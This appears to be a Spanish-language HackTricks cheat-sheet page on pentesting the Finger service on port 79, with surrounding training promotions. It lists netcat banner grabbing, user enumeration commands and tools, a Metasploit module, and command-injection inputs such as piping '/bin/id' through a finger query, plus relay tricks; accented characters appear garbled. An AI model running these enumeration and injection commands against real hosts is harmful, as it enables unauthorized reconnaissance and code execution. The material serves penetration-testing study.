79 - Pentesting Finger
Reading time: 2 minutes
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.
Informaci贸n B谩sica
El programa/servicio Finger se utiliza para recuperar detalles sobre los usuarios de computadoras. T铆picamente, la informaci贸n proporcionada incluye el nombre de inicio de sesi贸n del usuario, nombre completo, y, en algunos casos, detalles adicionales. Estos detalles adicionales podr铆an abarcar la ubicaci贸n de la oficina y el n煤mero de tel茅fono (si est谩 disponible), la hora en que el usuario inici贸 sesi贸n, el per铆odo de inactividad (tiempo inactivo), la 煤ltima vez que el correo fue le铆do por el usuario, y el contenido de los archivos de plan y proyecto del usuario.
Puerto por defecto: 79
PORT STATE SERVICE
79/tcp open finger
Enumeraci贸n
Captura de Banner/Conexi贸n b谩sica
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Enumeraci贸n de usuarios
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternativamente, puedes usar finger-user-enum de pentestmonkey, algunos ejemplos:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap ejecuta un script para hacer usando scripts predeterminados
Metasploit utiliza m谩s trucos que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Ejecuci贸n de comandos
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Finger Bounce
Usar un sistema como un rel茅 de finger
finger user@host@victim
finger @internal@external
tip
Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apoya a HackTricks
- Revisa los planes de suscripci贸n!
- 脷nete al 馃挰 grupo de Discord o al grupo de telegram o s铆guenos en Twitter 馃惁 @hacktricks_live.
- Comparte trucos de hacking enviando PRs a HackTricks y HackTricks Cloud repos de github.